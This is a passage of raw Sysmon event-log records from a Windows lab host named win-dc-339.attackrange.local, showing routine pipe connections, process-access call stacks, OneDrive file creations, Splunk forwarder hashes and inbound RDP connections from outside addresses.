14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.810{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E90D0008EDF939260DA57A72B7E5410,SHA256=C095495D01806CE9A79D04EE58B20C3E8CCE5976CBDE8A943E1CED581C51F136,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.795{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000078940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.795{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000078939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.795{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 18141800x800000000000000078938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.748{A7A01FEF-B636-607E-2700-00000000BB01}27241412C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000078936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.748{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=4662C9AD8A013292B31ED11EC0BAF11A,SHA256=54A84E383BB9CC62C125B434943E98D0F37026C59ACCBEDB7DB3CD98A00232F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.748{A7A01FEF-B636-607E-2700-00000000BB01}27241412C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 18141800x800000000000000078934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.654{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0D149F025C00F97902F256DD0D6294DC,SHA256=2363507528F738A6DE8A77EDE070877B8B96B7D3B5AA7B3D9C241F89EFABA317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.654{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=02F65796E501DD809435777E0A9831CB,SHA256=215C0780FA0243B24A3A81258E4EFFDE91B3BAFB32271EEDC65C07915D724BA4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000078929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:13.654{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDrive.exe2021-04-20 14:58:13.638 11241100x800000000000000078928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:13.654{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Widgets.dll2021-04-20 14:58:13.623 18141800x800000000000000078927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000078925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:13.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.185{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:13.123{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\msvcp140.dll2021-04-20 14:58:13.123 18141800x800000000000000078913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000078911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:11.172{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54382-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:11.127{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10403-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:11.127{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7678-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 18141800x800000000000000078908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:12.935{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 